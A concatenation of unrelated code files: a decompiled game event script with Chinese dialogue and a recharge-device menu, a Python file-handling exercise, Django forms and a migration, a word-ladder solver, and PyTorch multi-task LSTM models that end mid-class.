OP_8C(0xFE, 135, 400)
ExitThread()
QueueWorkItem(0x107, 2, lambda_D4D)
SetChrFlags(0x107, 0x1000)
SetChrChipByIndex(0x107, 8)
def lambda_D65():
OP_8F(0xFE, 0x3214A, 0x0, 0xFFFF9566, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x107, 1, lambda_D65)
OP_51(0x101, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
SetChrChipByIndex(0x101, 7)
def lambda_D90():
OP_99(0xFE, 0x0, 0xC, 0x9C4)
ExitThread()
QueueWorkItem(0x101, 3, lambda_D90)
OP_22(0xA4, 0x0, 0x64)
OP_22(0x1F4, 0x0, 0x64)
OP_96(0x101, 0x31830, 0x0, 0xFFFF9C00, 0x5DC, 0x1770)
OP_7C(0x0, 0x64, 0xBB8, 0x64)
PlayEffect(0x8, 0xFF, 0xFF, 202800, 0, -25600, 0, 0, 0, 1000, 1000, 1000, 0xFF, 0, 0, 0, 0)
def lambda_E07():
OP_94(0x1, 0xA, 0xB4, 0x7D0, 0x3A98, 0x0)
ExitThread()
QueueWorkItem(0xA, 1, lambda_E07)
OP_96(0x101, 0x31A92, 0x0, 0xFFFF9A52, 0x1F4, 0x1388)
def lambda_E34():
OP_94(0x1, 0xFE, 0xB4, 0x384, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0x8, 1, lambda_E34)
def lambda_E4A():
OP_94(0x1, 0xFE, 0xB4, 0x3E8, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x9, 1, lambda_E4A)
def lambda_E60():
OP_94(0x1, 0xFE, 0xB4, 0x1F4, 0x3E8, 0x0)
ExitThread()
QueueWorkItem(0xB, 1, lambda_E60)
WaitChrThread(0x102, 0x1)
SetChrChipByIndex(0x102, 5)
ClearChrFlags(0x102, 0x4)
Sleep(1000)
NpcTalk(
0x107,
"小女孩",
"#065F咦……\x02",
)
CloseMessageWindow()
SetChrChipByIndex(0x107, 1)
ClearChrFlags(0x107, 0x1000)
TurnDirection(0x107, 0x101, 400)
NpcTalk(
0x107,
"小女孩",
"#560F啊,刚才的……!\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#006F待会再慢慢聊吧!\x01",
"你先退到我们后面去!\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#012F总之\x01",
"先把这些家伙赶走吧!\x02",
)
)
CloseMessageWindow()
Battle(0x3A7, 0x0, 0x0, 0x0, 0xFF)
Switch(
(scpexpr(EXPR_PUSH_VALUE_INDEX, 0x3), scpexpr(EXPR_END)),
(1, "loc_F49"),
(SWITCH_DEFAULT, "loc_F4C"),
)
label("loc_F49")
OP_B4(0x0)
Return()
label("loc_F4C")
EventBegin(0x0)
OP_4F(0x23, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
SetChrFlags(0x8, 0x80)
SetChrFlags(0x9, 0x80)
SetChrFlags(0xA, 0x80)
SetChrFlags(0xB, 0x80)
SetChrPos(0x101, 202800, 0, -25600, 315)
SetChrPos(0x102, 202500, 0, -27300, 315)
SetChrPos(0x107, 204200, 0, -26900, 315)
OP_6D(203400, 0, -26050, 0)
SetChrChipByIndex(0x107, 65535)
OP_71(0x0, 0x4)
OP_71(0x1, 0x4)
FadeToBright(1000, 0)
OP_0D()
NpcTalk(
0x107,
"小女孩",
(
"#065F真、真是吓死人了~……\x02\x03",
"#067F那个那个……\x01",
"真是非常感谢呢。\x02\x03",
"救了我一命呢。\x02",
)
)
CloseMessageWindow()
OP_44(0x102, 0xFF)
OP_44(0x101, 0xFF)
def lambda_1040():
OP_6B(2790, 2000)
ExitThread()
QueueWorkItem(0x101, 0, lambda_1040)
SetChrChipByIndex(0x102, 65535)
TurnDirection(0x102, 0x107, 400)
SetChrChipByIndex(0x101, 65535)
TurnDirection(0x101, 0x107, 400)
WaitChrThread(0x101, 0x0)
ChrTalk(
0x101,
(
"#001F啊哈哈。\x01",
"你没事就好了。\x02\x03",
"#006F不过……\x01",
"以后可要吸取教训哦。\x02\x03",
"一个人和魔兽战斗\x01",
"这种危险的事可不能做哦。\x02",
)
)
CloseMessageWindow()
NpcTalk(
0x107,
"小女孩",
(
"#065F啊,但是但是……\x02\x03",
"如果放着不管的话,\x01",
"隧道的照明灯会坏掉呢……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#505F这么说来……\x02\x03",
"为什么魔兽会聚集在\x01",
"熄灭了的照明灯周围呢?\x02",
)
)
CloseMessageWindow()
Jc((scpexpr(EXPR_EXEC_OP, "OP_29(0x6, 0x1, 0x8)"), scpexpr(EXPR_END)), "loc_12D6")
ChrTalk(
0x102,
(
"#010F以前在更换路灯的时候\x01",
"不是也发生过同样的事吗?\x02\x03",
"因为导力器里的七耀石\x01",
"是魔兽喜欢的东西。\x02\x03",
"因此路灯里\x01",
"都带有驱赶魔兽的机能……\x02\x03",
"如果这种机能坏了的话,\x01",
"自然就会容易吸引魔兽过来。\x02",
)
)
CloseMessageWindow()
Jump("loc_1392")
label("loc_12D6")
ChrTalk(
0x102,
(
"#010F因为导力器里的七耀石\x01",
"是魔兽喜欢的东西。\x02\x03",
"因此路灯里\x01",
"都带有驱赶魔兽的机能……\x02\x03",
"如果这种机能坏了的话,\x01",
"自然就会容易吸引魔兽过来。\x02",
)
)
CloseMessageWindow()
label("loc_1392")
ChrTalk(
0x101,
(
"#501F啊,原来是这样啊。\x02\x03",
"#007F不过就算这样,\x01",
"也不能这么胡来啊。\x02\x03",
"万一受伤的话可就不好了。\x02",
)
)
CloseMessageWindow()
NpcTalk(
0x107,
"小女孩",
(
"#063F啊……\x01",
"对、对不起……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#019F好了好了,到此为止吧。\x02\x03",
"更何况,『不能胡来』从你嘴里说出来,\x01",
"可是完全没有说服力啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#509F讨厌,少泼冷水啦。\x02\x03",
"#006F算了……\x01",
"我叫艾丝蒂尔。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F我是约修亚。\x02\x03",
"我们俩都是\x01",
"游击士协会的见习游击士。\x02",
)
)
CloseMessageWindow()
NpcTalk(
0x107,
"小女孩",
(
"#061F哇~~\x01",
"难怪那么厉害呢……\x02\x03",
"#060F我叫提妲。\x02\x03",
"现在正在\x01",
"蔡斯的中央工房实习。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#501F嘿嘿~\x01",
"所以才会打扮成这样吧。\x02\x03",
"那么,提妲。\x02\x03",
"你要回蔡斯的话,\x01",
"就和我们一起走吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F是啊。\x01",
"如果再遇到魔兽就糟糕了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#061F真、真的吗?\x01",
"真是非常感谢呢。\x02\x03",
"#560F啊,不过请稍等一下。\x01",
" \x02\x03",
"我得先修理好那个照明灯。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#004F啊,那也是。\x01",
"这样放着不管的确非常危险。\x02\x03",
"不过……\x01",
"你是怎么知道这里的照明灯坏了呢?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#060F啊,我在调查电脑的\x01",
"数据库的时候偶然发现的。\x02\x03",
"好像当初安装时候用的是次品,\x01",
"而且设置元件也不齐全。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F原来如此,\x01",
"那你还是快看看吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#505F(电脑?数据库?)\x02",
)
CloseMessageWindow()
FadeToDark(1000, 0, -1)
OP_0D()
OP_6D(198940, 30, -23590, 0)
OP_6B(2800, 0)
OP_6C(45000, 0)
SetChrPos(0x101, 199360, 10, -24480, 0)
SetChrPos(0x102, 198190, 20, -24530, 0)
SetChrPos(0x107, 199160, 20, -22710, 0)
SetChrFlags(0x107, 0x4)
Sleep(500)
FadeToBright(1000, 0)
OP_0D()
ChrTalk(
0x107,
"#062F#4P……嘿咻。\x02",
)
CloseMessageWindow()
OP_72(0x1, 0x4)
Sleep(100)
OP_71(0x1, 0x4)
Sleep(100)
OP_72(0x1, 0x4)
Sleep(100)
OP_71(0x1, 0x4)
Sleep(90)
OP_72(0x1, 0x4)
Sleep(80)
OP_71(0x1, 0x4)
Sleep(70)
OP_72(0x1, 0x4)
Sleep(60)
OP_71(0x1, 0x4)
Sleep(50)
OP_72(0x1, 0x4)
Sleep(1000)
ChrTalk(
0x107,
"#560F#4P好~这样就可以了。\x02",
)
CloseMessageWindow()
OP_8F(0x107, 0x309BC, 0x1E, 0xFFFFA4DE, 0x7D0, 0x0)
OP_8C(0x107, 180, 400)
ClearChrFlags(0x107, 0x4)
ChrTalk(
0x107,
"#061F#1P让你们久等了。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#501F哎~好厉害。\x01",
"原来你这么熟练的啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#019F真不愧是\x01",
"在中央工房的见习生啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#067F#1P嘿嘿……\x01",
"这不算什么啦。\x02\x03",
"只不过是修正接触不良的结晶回路\x01",
"和调整错乱的导力压而已。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#505F???\x02\x03",
"唔……\x01",
"听起来好像相当复杂的样子呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#560F其实一点也不复杂。\x02\x03",
"这个呢,\x01",
"简单解释起来的话……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#1K#1P在导力器的内部镶嵌着\x01",
"可以发挥各种功能的结晶回路。\x01",
"结晶回路与元件必须准确地\x01",
"进行连接才能使导力器正常运作,\x01",
"而当两者出现连接错误时,\x01",
"导力器生成的导力就会无处可去,\x01",
"其结果自然就导致\x01",
"设计时预想的机能无法正常发挥。\x01",
"以照明灯的情况来说就是发光和驱除魔兽的……\x02",
)
)
Sleep(2000)
OP_62(0x101, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
ChrTalk(
0x101,
"#1K#004F停、停一下!\x02",
)
OP_56(0x1)
OP_59()
ChrTalk(
0x101,
(
"#506F还、还是以后再慢慢解释吧。\x01",
"我们差不多该出发了呢~\x02\x03",
"嗯嗯~\x01",
"站在这里说话也不方便嘛。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x107,
(
"#067F#1P啊,说得也是。\x01",
"虽然没解释完有点可惜……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#007F(呼……)\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#019F哈哈,\x01",
"那我们继续前往蔡斯吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#006FOK!\x02",
)
CloseMessageWindow()
ChrTalk(
0x107,
"#061F#1P好的。\x02",
)
CloseMessageWindow()
ClearChrFlags(0x101, 0x1000)
ClearChrFlags(0x102, 0x1000)
OP_64(0x0, 0x1)
EventEnd(0x0)
label("loc_1E51")
Return()
# Function_4_637 end
def Function_5_1E52(): pass

# Decompiled event-script handler for an orbment recharge device:
# shows a "rest here / leave" menu; on "rest" it plays the recharge
# effect and sound, restores the party, and fades back in.
label("Function_5_1E52")
FadeToDark(300, 0, 100)
# Narration: "This is an orbal device that lets travelers recover stamina."
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"这是一台可供旅行者回复体力的导力器装置。\x07\x00\x02",
)
)
OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0x18), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Menu(
0,
10,
32,
1,
(
"在此休息\x01", # 0: "rest here"
"离开\x01", # 1: "leave"
)
)
MenuEnd(0x1)
OP_4F(0x28, (scpexpr(EXPR_PUSH_LONG, 0xFFFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_5F(0x0)
OP_56(0x0)
# Branch on the menu result: non-zero (chose "leave") jumps to loc_2071.
Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_2071")
FadeToBright(100, 0)
Sleep(500)
SoundLoad(13)
OP_82(0x0, 0x2)
PlayEffect(0x0, 0x2, 0xFF, 285640, 1000, -26290, 0, 0, 0, 700, 700, 700, 0xFF, 0, 0, 0, 0)
OP_6F(0x11, 0)
OP_70(0x11, 0x32)
OP_73(0x11)
OP_20(0xBB8)
OP_22(0xC, 0x0, 0x64)
OP_82(0x2, 0x2)
LoadEffect(0x1, "map\\\\mp027_01.eff")
PlayEffect(0x1, 0x1, 0xFF, 285640, 1000, -26290, 0, 0, 0, 1500, 1500, 1500, 0xFF, 0, 0, 0, 0)
FadeToDark(1000, 0, -1)
Sleep(700)
OP_22(0xD, 0x0, 0x64)
OP_0D()
# OP_31 over slots 0x0-0x7 presumably restores each party member's
# stats — TODO confirm against the engine's opcode table.
OP_31(0x0, 0xFE, 0x0)
OP_31(0x1, 0xFE, 0x0)
OP_31(0x2, 0xFE, 0x0)
OP_31(0x3, 0xFE, 0x0)
OP_31(0x4, 0xFE, 0x0)
OP_31(0x5, 0xFE, 0x0)
OP_31(0x6, 0xFE, 0x0)
OP_31(0x7, 0xFE, 0x0)
# Reposition the (up to four) party members beside the device.
SetChrPos(0x0, 285600, 30, -28390, 13)
SetChrPos(0x1, 285600, 30, -28390, 13)
SetChrPos(0x2, 285600, 30, -28390, 13)
SetChrPos(0x3, 285600, 30, -28390, 13)
OP_69(0x0, 0x0)
OP_30(0x0)
Sleep(3500)
OP_82(0x1, 0x2)
LoadEffect(0x0, "map\\\\mp027_00.eff")
PlayEffect(0x0, 0x0, 0xFF, 285640, 1000, -26290, 0, 0, 0, 1300, 1300, 1300, 0xFF, 0, 0, 0, 0)
OP_6F(0x11, 0)
OP_1E()
FadeToBright(1000, 0)
OP_56(0x0)
TalkEnd(0xFF)
Return()
# Chose "leave": just fade back in and end the interaction.
label("loc_2071")
Jc((scpexpr(EXPR_GET_RESULT, 0x1), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_208B")
FadeToBright(300, 0)
TalkEnd(0xFF)
Return()
label("loc_208B")
Return()
# Function_5_1E52 end
SaveToFile()
Try(main)
|
import time
import sys
# file = open('flush.txt','w')
# file.write('a')
# # file.flush()
# time.sleep(20)
# file.close()
#
# for i in range(20):
# # sys.stdout.write('#')
# # sys.stdout.flush()
# print('#',end='')
# time.sleep(0.2)
# file = open('flush.txt','a')
# # file.write('a')
# file.truncate(1) # 截断,不加参数默认从起始位置开始截断
# file.fileno() # 返回一个文件操作符,是一个非负整形的数,唯一的代表
# file.close()
'''
昨夜寒蛰不住鸣。
惊回千里梦,已三更。
起来独自绕阶行。
人悄悄,帘外月胧明。
白首为功名,旧山松竹老,阻归程。
欲将心事付瑶琴。
知音少,弦断有谁听。
'''
# r+ 读写模式,w+ 写读模式,a+ 追加读模式
# file = open('小重山.txt','r+')
# print(file.readline())
# print('###')
# # file.seek(10)
# file.write('1111')
# print(file.readline())
# file.close()
# file = open('小重山.txt','w+')
# print(file.readline())
# file.write('111111')
# # file.seek(0)
# print(file.readline())
# file.close()
# Exercise: append "alex" to the end of line 6 of a text file.
# A text file cannot be edited in place line-by-line, so the modified
# content is written out to a copy of the file instead.
file = open('小重山.txt', 'r+')
file2 = open('小重山2.txt', 'w+')
number = 1
for line in file:
    if number == 6:
        # strip the trailing newline, append the suffix, restore the newline
        line = ''.join([line.strip(), 'alex\n'])
    file2.write(line)
    file2.flush()
    number += 1
file.close()
# BUG FIX: after the writes, file2's position is at EOF, so iterating it
# printed nothing; rewind to the start before reading the copy back.
file2.seek(0)
for f in file2:
    print(f)
file2.close()
with open('log', 'r') as f:
    f.readlines()
    # NOTE(review): the position is at EOF after readlines(), so this
    # read() returns '' — presumably just a demonstration.
    f.read()
# leaving the with-block closes the file automatically
print('hello')
# `with` can manage several file objects at once
with open('file1', 'r') as file1, open('file2', 'w') as file2:
    file1.read()
|
from django import forms
from .models import Candidato, Experiencia
class CandidateForm(forms.ModelForm):
    """ModelForm for creating/editing a Candidato (job candidate) record."""

    class Meta:
        # Model the form is generated from.
        model = Candidato
        # Explicit whitelist of editable fields; tuple order is render order.
        fields = (
            'cedula',
            'nombre',
            'puesto',
            'departamento',
            'salario_aspira',
            'competencias',
            'capacitaciones',
            'experiencias',
            'recomendado_por',
        )
class ExperienciaForm(forms.ModelForm):
    """ModelForm for a single Experiencia (work-experience) entry."""

    class Meta:
        # Model the form is generated from.
        model = Experiencia
        # Explicit whitelist of editable fields; tuple order is render order.
        fields = (
            'empresa',
            'puesto_ocupado',
            'fecha_desde',
            'fecha_hasta',
            'salario',
        )
|
class Solution:
    def ladderLength(self, beginWord, endWord, WordList):
        """Return the length of the shortest word-ladder from beginWord to
        endWord (counting both endpoints), or 0 if none exists.

        BFS over single-letter mutations. WordList must be a set of
        lowercase words of the same length as beginWord; NOTE it is
        mutated (endWord added, visited words removed).
        """
        from collections import deque
        from string import ascii_lowercase

        WordList.add(endWord)
        n = len(beginWord)
        queue = deque([(beginWord, 1)])
        while queue:
            word, steps = queue.popleft()
            if word == endWord:
                return steps
            # BUG FIX: xrange is Python 2 only; range works on both.
            for i in range(n):
                for ch in ascii_lowercase:
                    if word[i] == ch:
                        continue
                    candidate = word[:i] + ch + word[i + 1:]
                    if candidate in WordList:
                        queue.append((candidate, steps + 1))
                        # remove so each word is visited at most once
                        WordList.remove(candidate)
        return 0
# Generated by Django 3.0.8 on 2020-11-05 16:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Replace campus.course_name with a ForeignKey to LandingPage.Course."""

    dependencies = [
        ('LandingPage', '0004_auto_20201103_1935'),
        ('campus', '0002_auto_20201105_2214'),
    ]

    operations = [
        # Drop the old column (presumably a free-text course name,
        # superseded by the FK below — confirm against model 0002).
        migrations.RemoveField(
            model_name='campus',
            name='course_name',
        ),
        # null=True keeps existing rows valid; CASCADE deletes campus rows
        # when their Course is deleted.
        migrations.AddField(
            model_name='campus',
            name='course',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='campus_course', to='LandingPage.Course'),
        ),
    ]
|
# -*- coding: utf8 -*-
import torch
import torch.autograd as autograd
import torch.nn as nn
import torch.nn.init
import torch.nn.functional as F
# import numpy as np
from loader import CAP_DIM
from torch.autograd import Variable
import math
'''
def _calculate_fan_in_and_fan_out(tensor):
dimensions = tensor.ndimension()
if dimensions < 2:
raise ValueError("Fan in and fan out can not be computed for tensor with less than 2 dimensions")
if dimensions == 2: # Linear
fan_in = tensor.size(1)
fan_out = tensor.size(0)
else:
num_input_fmaps = tensor.size(1)
num_output_fmaps = tensor.size(0)
receptive_field_size = 1
if tensor.dim() > 2:
receptive_field_size = tensor[0][0].numel()
fan_in = num_input_fmaps * receptive_field_size
fan_out = num_output_fmaps * receptive_field_size
return fan_in, fan_out
def xavier_normal(tensor, gain=1):
if isinstance(tensor, Variable):
xavier_normal(tensor.data, gain=gain)
return tensor
fan_in, fan_out = _calculate_fan_in_and_fan_out(tensor)
std = gain * math.sqrt(2.0 / (fan_in + fan_out))
return tensor.normal_(0, std)
def xavier_uniform(tensor, gain=1):
if isinstance(tensor, Variable):
xavier_uniform(tensor.data, gain=gain)
return tensor
fan_in, fan_out = _calculate_fan_in_and_fan_out(tensor)
std = gain * math.sqrt(2.0 / (fan_in + fan_out))
a = math.sqrt(3.0) * std # Calculate uniform bounds from standard deviation
return tensor.uniform_(-a, a)
'''
class Base(nn.Module):
    """Common base for the models in this module.

    Subclasses must create self.embed (and, for GPU use, self.use_cuda and
    self.device) and define forward(); this class provides embedding
    initialization, prediction, and a cross-entropy loss helper.
    """

    def __init__(self, param):
        # param is accepted for a uniform constructor signature; this base
        # does not read it.
        super(Base, self).__init__()
        #self.device = 0

    def init_embed(self, init_matrix):
        """Load a pre-trained embedding matrix (list/array, vocab x dim)
        into self.embed, moving it to the GPU when use_cuda is set."""
        if self.use_cuda:
            self.embed.weight = nn.Parameter(torch.FloatTensor(init_matrix).cuda(self.device))
            self.embed_weight = self.embed.weight
        else:
            self.embed.weight = nn.Parameter(torch.FloatTensor(init_matrix))

    def predict(self, words):
        """Return the argmax tag id(s) for the forward() output."""
        #TODO: caps
        output = self.forward(words)
        # NOTE(review): dim=0 reduces over the first axis; for batched
        # (N, C) logits dim=1 would be expected — confirm with callers.
        _, tag_id = torch.max(output, dim=0)
        return tag_id

    def get_loss(self, tags, words):
        """Cross-entropy loss of forward(words) against gold tags."""
        logit = self.forward(words)
        loss = F.cross_entropy(logit, tags)
        #loss = F.cross_entropy(self, tags)
        return loss
class JointLSTM(Base):
    """Two-task model with two LSTMs.

    idx == 0: sentence classification — both LSTMs run, their outputs are
    concatenated, self-attention (attn1) pools them into r vectors, and
    mlp1/mlp2 produce c0 class probabilities.
    idx != 0: per-token tagging — only lstm2 runs and tagger maps each
    state to c1 tag scores.
    """

    def __init__(self, param):
        super(JointLSTM, self).__init__(param)
        self.use_cuda = param['use_cuda']
        self.v = param['vocab_size']    # vocabulary size
        self.e = param['embed_dim']     # embedding dimension
        self.u = param['lstm_dim']      # per-direction LSTM hidden size
        self.r = param['r']             # attention hops
        self.bilstm = param['bilstm']
        self.c0 = param['c0']           # classes for task 0
        self.c1 = param['c1']           # tag classes for task 1
        self.device = param['device']
        self.batch = param['batch_size']
        # BUG FIX: self.debug was unconditionally forced to True after the
        # param check, defeating param['debug']; honor the param instead.
        self.debug = param.get('debug', False)
        if self.use_cuda:
            self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
            self.lstm1 = nn.LSTM(self.e, self.u, bidirectional=self.bilstm).cuda(self.device)
            self.lstm2 = nn.LSTM(self.e, self.u, bidirectional=self.bilstm).cuda(self.device)
            if self.bilstm:
                self.u = self.u * 2  # outputs are fwd+bwd concatenated
            self.attn1 = nn.Linear(self.u * 2, self.r, bias=False).cuda(self.device)
            #self.attn2 = nn.Linear(self.u, self.r, bias=False).cuda(self.device)
            self.mlp1 = nn.Linear(self.u * 2, 1).cuda(self.device)
            self.mlp2 = nn.Linear(self.r, self.c0).cuda(self.device)
            self.tagger = nn.Linear(self.u, self.c1).cuda(self.device)
        else:
            # BUG FIX: the CPU branch built a single self.lstm plus layers
            # sized for self.u, while forward() uses self.lstm1/self.lstm2
            # and the concatenated width self.u * 2 — every CPU run crashed
            # with AttributeError. Mirror the GPU branch exactly.
            self.embed = nn.Embedding(self.v, self.e)
            self.lstm1 = nn.LSTM(self.e, self.u, bidirectional=self.bilstm)
            self.lstm2 = nn.LSTM(self.e, self.u, bidirectional=self.bilstm)
            if self.bilstm:
                self.u = self.u * 2
            self.attn1 = nn.Linear(self.u * 2, self.r, bias=False)
            self.mlp1 = nn.Linear(self.u * 2, 1)
            self.mlp2 = nn.Linear(self.r, self.c0)
            self.tagger = nn.Linear(self.u, self.c1)
        self.tanh = nn.Tanh()
        self.softmax = nn.Softmax()

    def forward(self, idx, words):
        """words: LongTensor (seq_len, batch) of token ids; idx picks the task."""
        #self.embed.weight = self.embed_weight
        embeds = self.embed(words)
        batch = embeds.size(1)
        slen = embeds.size(0)
        if self.debug:
            print('embeds', embeds.size())
        #embeds = torch.transpose(embeds, 0, 1)
        if idx == 0:
            H, self.hidden = self.lstm1(embeds)
            H2, self.hidden = self.lstm2(embeds)
            H = torch.cat((H, H2), 2)  # (slen, batch, 2u)
            if self.debug:
                print('H', H.size())
                print('u', self.u)
                print('batch', self.batch)
                print('slen', slen)
            H = H.view(batch * slen, self.u * 2)
            if self.debug:
                print('H', H.size())
            A = self.attn1(H)
            if self.debug:
                print('A', A.size())
            A = A.view(slen, batch, self.r)
            H = H.view(slen, batch, self.u * 2)
            H = torch.transpose(H, 0, 1)
            A = torch.transpose(A, 0, 1)
            A = torch.transpose(A, 1, 2)  # (batch, r, slen)
            if self.debug:
                print('A', A.size())
                print('H', H.size())
            M = torch.bmm(A, H)  # attention-pooled states, (batch, r, 2u)
            if self.debug:
                print('M', M.size())
            M = M.view(batch * self.r, -1)
            mlp1 = F.relu(self.mlp1(M))
            mlp1 = mlp1.view(batch, -1)
            if self.debug:
                print('mlp1', mlp1.size())
            mlp2 = F.relu(self.mlp2(mlp1))
            if self.debug:
                print('mlp2', mlp2.size())
            out = F.softmax(mlp2)
        else:
            H, self.hidden = self.lstm2(embeds)
            if self.debug:
                print('H', H.size())
                print('u', self.u)
                print('batch', self.batch)
                print('slen', slen)
            H = H.view(batch * slen, self.u)
            if self.debug:
                print('H', H.size())
            #A = self.attn2(H)
            A = H
            if self.debug:
                print('A', A.size())
            out = self.tagger(A)
        self.debug = False  # only trace sizes on the first call
        return out
class ShareLSTM2(Base):
    """Multi-task model with one shared LSTM and per-task heads.

    idx == 0: sentence classification — self-attention (attn1) pools the
    shared LSTM states into r vectors, then mlp1/mlp2 produce c0 class
    probabilities.
    idx != 0: per-token tagging — attn2 projects each LSTM state and
    tagger maps it to c1 tag scores.
    """

    def __init__(self, param):
        super(ShareLSTM2, self).__init__(param)
        self.use_cuda = param['use_cuda']
        self.v = param['vocab_size']    # vocabulary size
        self.e = param['embed_dim']     # embedding dimension
        self.u = param['lstm_dim']      # per-direction LSTM hidden size
        self.r = param['r']             # attention hops
        self.bilstm = param['bilstm']
        self.c0 = param['c0']           # classes for task 0
        self.c1 = param['c1']           # tag classes for task 1
        self.device = param['device']
        self.batch = param['batch_size']
        # BUG FIX: debug was unconditionally forced to True afterwards,
        # making param['debug'] dead; honor the param instead.
        self.debug = param.get('debug', False)
        if self.use_cuda:
            self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
            self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm).cuda(self.device)
            if self.bilstm:
                self.u = self.u * 2  # outputs are fwd+bwd concatenated
            self.attn1 = nn.Linear(self.u, self.r, bias=False).cuda(self.device)
            self.attn2 = nn.Linear(self.u, self.r, bias=False).cuda(self.device)
            self.mlp1 = nn.Linear(self.u, 1).cuda(self.device)
            self.mlp2 = nn.Linear(self.r, self.c0).cuda(self.device)
            self.tagger = nn.Linear(self.r, self.c1).cuda(self.device)
        else:
            self.embed = nn.Embedding(self.v, self.e)
            self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm)
            if self.bilstm:
                self.u = self.u * 2
            self.attn1 = nn.Linear(self.u, self.r, bias=False)
            self.attn2 = nn.Linear(self.u, self.r, bias=False)
            self.mlp1 = nn.Linear(self.u, 1)
            self.mlp2 = nn.Linear(self.r, self.c0)
            self.tagger = nn.Linear(self.r, self.c1)
        self.tanh = nn.Tanh()
        self.softmax = nn.Softmax()

    def forward(self, idx, words):
        """words: LongTensor (seq_len, batch) of token ids; idx picks the task."""
        embeds = self.embed(words)
        batch = embeds.size(1)
        slen = embeds.size(0)
        if self.debug:
            print('embeds', embeds.size())
        #embeds = torch.transpose(embeds, 0, 1)
        H, self.hidden = self.lstm(embeds)
        if self.debug:
            print('H', H.size())
            print('u', self.u)
            print('batch', self.batch)
            print('slen', slen)
        H = H.view(batch * slen, self.u)
        if self.debug:
            print('H', H.size())
        if idx == 0:
            A = self.attn1(H)
            if self.debug:
                print('A', A.size())
            A = A.view(slen, batch, self.r)
            H = H.view(slen, batch, self.u)
            H = torch.transpose(H, 0, 1)
            A = torch.transpose(A, 0, 1)
            A = torch.transpose(A, 1, 2)  # (batch, r, slen)
            if self.debug:
                print('A', A.size())
                print('H', H.size())
            M = torch.bmm(A, H)  # attention-pooled states, (batch, r, u)
            if self.debug:
                print('M', M.size())
            M = M.view(batch * self.r, -1)
            mlp1 = F.relu(self.mlp1(M))
            mlp1 = mlp1.view(batch, -1)
            if self.debug:
                print('mlp1', mlp1.size())
            mlp2 = F.relu(self.mlp2(mlp1))
            if self.debug:
                print('mlp2', mlp2.size())
            out = F.softmax(mlp2)
        else:
            A = self.attn2(H)
            if self.debug:
                print('A', A.size())
            out = self.tagger(A)
        self.debug = False  # only trace sizes on the first call
        return out
class ShareLSTM(Base):
    """Multi-task model sharing one LSTM *and* one projection (attn1).

    idx == 0: sentence classification — attn1's projection is used as
    attention weights to pool the states, then mlp1/mlp2 produce c0 class
    probabilities.
    idx != 0: per-token tagging — the same attn1 projection is fed
    directly to tagger for c1 tag scores.
    """

    def __init__(self, param):
        super(ShareLSTM, self).__init__(param)
        self.use_cuda = param['use_cuda']
        self.v = param['vocab_size']    # vocabulary size
        self.e = param['embed_dim']     # embedding dimension
        self.u = param['lstm_dim']      # per-direction LSTM hidden size
        self.r = param['r']             # attention hops / shared proj width
        self.bilstm = param['bilstm']
        self.c0 = param['c0']           # classes for task 0
        self.c1 = param['c1']           # tag classes for task 1
        self.batch = param['batch_size']
        self.device = param['device']
        # BUG FIX: debug was unconditionally forced to True afterwards,
        # making param['debug'] dead; honor the param instead.
        self.debug = param.get('debug', False)
        if self.use_cuda:
            self.embed = nn.Embedding(self.v, self.e).cuda(self.device)
            self.lstm = nn.LSTM(self.e, self.u, bidirectional=self.bilstm).cuda(self.device)
            if self.bilstm:
                self.u = self.u * 2  # outputs are fwd+bwd concatenated
            self.attn1 = nn.Linear(self.u, self.r, bias=False).cuda(self.device)
            self.mlp1 = nn.Linear(self.u, 1).cuda(self.device)
            self.mlp2 = nn.Linear(self.r, self.c0).cuda(self.device)
            self.tagger = nn.Linear(self.r, self.c1).cuda(self.device)
        else:
